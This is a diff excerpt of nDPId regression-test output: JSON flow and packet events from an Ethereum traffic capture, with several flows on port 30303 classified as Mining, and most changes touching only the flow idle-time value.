-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1578508365813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365813,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAG8nVeRDeiwKgBuHZf3WKbomHRWAgB9KAScSDEJQAAAgQFrAQCCAppF+qfItiYqQEDAwc="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1578508365813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365813,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4n3AqAG4XkQ3ot1idl9YCAH0m6Jh0oAQECxToAAAAQEICiLYmOdpF+qf"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365828,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365828,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGW5bAqAG4DfsOx91mdl9PCwRhAAAAALAC\/\/\/02wAAAgQFtAEDAwUBAQgKItiY9AAAAAAEAgAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365846,"flow_last_seen":1578508365846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365846,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1578508365846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365846,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtj\/AqAG4I+SeNN1ndl9FuX9aAAAAALAC\/\/\/dzAAAAgQFtAEDAwUBAQgKItiZBAAAAAAEAgAA"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365852,"flow_last_seen":1578508365852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365852,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1578508365852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365852,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG3OLAqAG4ijsROt1odl\/ttHvbAAAAALAC\/\/9f7QAAAgQFtAEDAwUBAQgKItiZCQAAAAAEAgAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365885,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365885,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365885,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2crAqAG4z7TO2N1pdl+dzwtmAAAAALAC\/\/8dEQAAAgQFtAEDAwUBAQgKItiZJwAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1578508365813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365813,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAG8nVeRDeiwKgBuHZf3WKbomHRWAgB9KAScSDEJQAAAgQFrAQCCAppF+qfItiYqQEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1578508365813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365813,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4n3AqAG4XkQ3ot1idl9YCAH0m6Jh0oAQECxToAAAAQEICiLYmOdpF+qf"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365828,"flow_last_seen":1578508365828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365828,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1578508365828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGW5bAqAG4DfsOx91mdl9PCwRhAAAAALAC\/\/\/02wAAAgQFtAEDAwUBAQgKItiY9AAAAAAEAgAA"} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365846,"flow_last_seen":1578508365846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365846,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1578508365846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365846,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtj\/AqAG4I+SeNN1ndl9FuX9aAAAAALAC\/\/\/dzAAAAgQFtAEDAwUBAQgKItiZBAAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365852,"flow_last_seen":1578508365852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365852,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1578508365852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365852,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG3OLAqAG4ijsROt1odl\/ttHvbAAAAALAC\/\/9f7QAAAgQFtAEDAwUBAQgKItiZCQAAAAAEAgAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365885,"flow_last_seen":1578508365885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365885,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1578508365885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365885,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2crAqAG4z7TO2N1pdl+dzwtmAAAAALAC\/\/8dEQAAAgQFtAEDAwUBAQgKItiZJwAAAAAEAgAA"} 
00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1578508365899,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1578508365899,"pkt":"KDc3AG3IEBMx8Tl2CABFAACxNvdAACcRcwrKcBxqwKgBuHZfdl8AnfAw9M4wDHlezlLb\/XVAde5xoPK0MYWPqo8wL1hvUi9RDAnTme70\/IGTzT1fYmed3PImx\/QlqjXSlKRDpOJrSqown1EL4xkYxe9gDpH7mkxI5SW3Td37cSNZr69+s5vwesE7AQLyy4RPFs69gun3gnZfoAhIsWiV\/\/bYUAtK\/XBnLAnnp\/ohE29dCVwVPQWUC9vDhF4WIGE="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1578508365903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365903,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGwUMj5J40wKgBuHZf3Weyx8H3Rbl\/W6AS\/ogN9wAAAgQFrAQCCAqAlezxItiZBAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1578508365903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365903,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtkvAqAG4I+SeNN1ndl9FuX9bssfB+IAQECwq5AAAAQEICiLYmTiAlezx"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1578508365903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365903,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGwUMj5J40wKgBuHZf3Weyx8H3Rbl\/W6AS\/ogN9wAAAgQFrAQCCAqAlezxItiZBAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1578508365903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365903,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtkvAqAG4I+SeNN1ndl9FuX9bssfB+IAQECwq5AAAAQEICiLYmTiAlezx"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1578508365919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365919,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc44MAAEARsuTAqAG4p1Z6MnZfdl8AiFGIcmRL\/sJ+HmBFF7n+UfEKJLvDdBgdKzSECJqxpMbuAWJCFnSyz1LOPGHXvK4XvgJfd8y9TVVaoZxiY0SgM1nuu1KcsxmveZ1Iboux45kEq0UHna5hbl98Bua+Zy2zz7pAAAHdBMuEfwAAAYJ2X4J2X8mEp1Z6MoJ2X4CEXhYgYQU="} 
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1578508365925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365925,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMG5s7PtM7YwKgBuHZf3WknDwC1nc8LZ6AScSCqDAAAAgQFrAQCCApcfI6dItiZJwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1578508365926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365926,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2dbAqAG4z7TO2N1pdl+dzwtnJw8AtoAQECw5oAAAAQEICiLYmUxcfI6d"} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1578508365925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365925,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMG5s7PtM7YwKgBuHZf3WknDwC1nc8LZ6AScSCqDAAAAgQFrAQCCApcfI6dItiZJwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1578508365926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365926,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2dbAqAG4z7TO2N1pdl+dzwtnJw8AtoAQECw5oAAAAQEICiLYmUxcfI6d"} 
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1578508365951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1578508365951,"pkt":"KDc3AG3IEBMx8Tl2CABFAACvrTpAADMRthqnVnoywKgBuHZfdl8AmyGXAff4avCCJKd8iLkYnGp5WBGcR5kwKjaGYfuGK7O5Pxha3PZrVargsE3sp+V969kCE0ZShXRyP212X0\/ogX+KLxU0BMrg9yur0MCSn4OC+hF8e78p1SovnEhcJv1j5UvsAALwyYSnVnoygnZfgKByZEv+wn4eYEUXuf5R8Qoku8N0GB0rNIQImrGkxu4BYoReFiBh"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366005,"flow_last_seen":1578508366005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366005,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1578508366005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366005,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGV9jAqAG4M1PtLN1sdl8dp4x2AAAAALAC\/\/+ZwwAAAgQFtAEDAwUBAQgKItiZlwAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366020,"flow_last_seen":1578508366020,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366020,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1578508366020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366020,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGwhnAqAG4WGNd291tdl+CSdQcAAAAALAC\/\/9XrgAAAgQFtAEDAwUBAQgKItiZpAAAAAAEAgAA"} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+KMAAAAgQFtAEDAwUBAQgKItiZrAAAAAAEAgAA"} 